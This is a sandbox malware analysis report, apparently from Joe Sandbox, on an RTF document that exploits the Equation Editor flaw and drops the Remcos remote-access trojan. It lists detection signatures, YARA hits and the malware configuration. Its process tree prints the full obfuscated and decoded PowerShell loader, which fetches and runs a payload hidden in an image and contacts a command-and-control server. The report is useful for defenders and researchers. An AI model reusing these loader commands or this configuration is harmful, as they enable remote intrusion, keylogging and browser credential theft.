Windows Analysis Report
xnHel.rtf

Overview

General Information

Sample name: xnHel.rtf
Analysis ID: 1509586
MD5: 0cedaf043bf1a0c4ccef486f9ec8cbd2
SHA1: d765d29e6a05ba6e72b8d718ade5f32f1379ebe5
SHA256: c34202144bc27f5a4ee328d03412eecc9241d75c4bffa44f40a41ce5c7340b0c
Tags: HUNrtf

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell download and load assembly
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Found potential equation exploit (CVE-2017-11882)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3260 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3340 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3488 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seennewthingsentireworldseethethin.vbS" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3536 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? 
? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?EU? ? ? ? ?TgBE? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?TwBm? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?BP? ? ? ? ?GY? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?Ek? ? ? ? 
?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwBl? ? ? ? ?C? ? ? ? ?? ? ? ? ?M? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?ZwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?C? ? ? ? ?? ? ? ? ?Kw? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?u? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bi? ? ? ? ?GE? ? ? ? ?cwBl? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?BM? ? ? ? ?GU? ? ? ? ?bgBn? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?Ek? ? ? ? ?bgBk? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?? ? ? ? ?g? ? ? ? ?C0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BJ? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?FM? ? ? ? ?dQBi? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?SQBu? ? ? ? ?GQ? ? ? ? ?ZQB4? ? ? ? ?Cw? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?Ew? ? ? ? ?ZQBu? ? ? ? ?Gc? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? 
?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBD? ? ? ? ?G8? ? ? ? ?bgB2? ? ? ? ?GU? ? ? ? ?cgB0? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?EY? ? ? ? ?cgBv? ? ? ? ?G0? ? ? ? ?QgBh? ? ? ? ?HM? ? ? ? ?ZQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GI? ? ? ? ?YQBz? ? ? ? ?GU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?EM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GQ? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBS? ? ? ? ?GU? ? ? ? ?ZgBs? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Gk? ? ? ? ?bwBu? ? ? ? ?C4? ? ? ? ?QQBz? ? ? ? ?HM? ? ? ? ?ZQBt? ? ? ? ?GI? ? ? ? ?b? ? ? ? ?B5? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?Ew? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?GM? ? ? ? ?bwBt? ? ? ? ?G0? ? ? ? ?YQBu? ? ? ? ?GQ? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HQ? ? ? ? ?eQBw? ? ? ? ?GU? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?Bs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?GU? ? ? ? ?Z? ? ? ? ?BB? ? ? ? ?HM? ? ? ? ?cwBl? ? ? ? ?G0? ? ? ? ?YgBs? ? ? ? ?Hk? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BU? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?Cg? ? ? ? ?JwBk? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GI? ? ? ? ?LgBJ? ? ? ? ?E8? ? ? ? ?LgBI? ? ? ? ?G8? ? ? ? ?bQBl? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?bQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B0? ? ? ? ?Hk? ? ? ? ?c? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?TQBl? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bv? ? ? ? ?GQ? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?FY? ? ? ? ?QQBJ? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?u? ? ? ? ?Ek? ? ? ? ?bgB2? ? ? ? ?G8? ? ? ? ?awBl? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bu? ? ? ? ?HU? ? ? ? ?b? ? ? ? ?Bs? ? ? ? ?Cw? ? ? ? ?I? ? ? 
? ?Bb? ? ? ? ?G8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?Fs? ? ? ? ?XQBd? ? ? ? ?C? ? ? ? ?? ? ? ? ?K? ? ? ? ?? ? ? ? ?n? ? ? ? ?HQ? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?BT? ? ? ? ?E8? ? ? ? ?TgBV? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?y? ? ? ? ?DQ? ? ? ? ?Lw? ? ? ? ?z? ? ? ? ?DI? ? ? ? ?MQ? ? ? ? ?u? ? ? ? ?Dk? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?D? ? ? ? ?? ? ? ? ?OQ? ? ? ? ?u? ? ? ? ?DU? ? ? ? ?N? ? ? ? ?? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?OgBw? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?I? ? ? ? ?? ? ? ? ?s? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBk? ? ? ? ?GU? ? ? ? ?cwBh? ? ? ? ?HQ? ? ? ? ?aQB2? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?Bv? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?FI? ? ? ? ?ZQBn? ? ? ? ?EE? ? ? ? ?cwBt? ? ? ? ?Cc? ? ? ? ?L? ? ? ? ?? ? ? ? ?n? ? ? ? ?Cc? ? ? ? ?KQ? ? ? ? ?p? ? ? ? ?? ? ? ? ?==';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.TSONU/124/321.98.09.54//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 3752 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Version": "5.1.1 Pro", "Host:Port:Password": "45.90.89.98:8243", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-O0U3JA", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: xnHel.rtf
Rule: INDICATOR_RTF_MalVer_Objects
Description: Detects RTF documents with a non-standard version that embed one of the objects mostly observed in exploit documents.
Author: ditekSHen
Strings:
  • 0x1ada:$obj1: \objhtml
  • 0x1b15:$obj2: \objdata
  • 0x1aff:$obj3: \objupdate
Source: C:\Users\user\Desktop\~WRD0000.tmp
Rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2
Description: Detects CVE-2017-8759 weaponized RTF documents.
Author: ditekSHen
Strings:
  • 0xc673:$clsid3: 4d73786d6c322e534158584d4c5265616465722e
  • 0xc6bd:$ole2: d0cf11e0a1b11ae1
  • 0x6c83:$obj2: \objdata
  • 0x6c61:$obj4: \objemb
Memory dumps (Source | Rule | Description | Author):
  • 00000009.00000002.906391209.0000000000911000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  • 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
  • 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  • 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
  • 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
    Strings:
      • 0x6c4b8:$a1: Remcos restarted by watchdog!
      • 0x6ca30:$a3: %02i:%02i:%02i:%03i
Unpacked PEs (Source | Rule | Description | Author):
  • 9.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
  • 9.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
  • 9.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
  • 9.2.RegAsm.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
    Strings:
      • 0x6c4b8:$a1: Remcos restarted by watchdog!
      • 0x6ca30:$a3: %02i:%02i:%02i:%03i
  • 9.2.RegAsm.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
    Strings:
      • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
      • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
      • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
      • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
      • 0x6657c:$str_b2: Executing file:
      • 0x675fc:$str_b3: GetDirectListeningPort
      • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
      • 0x67128:$str_b7: \update.vbs
      • 0x665a4:$str_b9: Downloaded file:
      • 0x66590:$str_b10: Downloading file:
      • 0x66634:$str_b12: Failed to upload file:
      • 0x675c4:$str_b13: StartForward
      • 0x675e4:$str_b14: StopForward
      • 0x67080:$str_b15: fso.DeleteFile "
      • 0x67014:$str_b16: On Error Resume Next
      • 0x670b0:$str_b17: fso.DeleteFolder "
      • 0x66624:$str_b18: Uploaded file:
      • 0x665e4:$str_b19: Unable to delete:
      • 0x67048:$str_b20: while fso.FileExists("
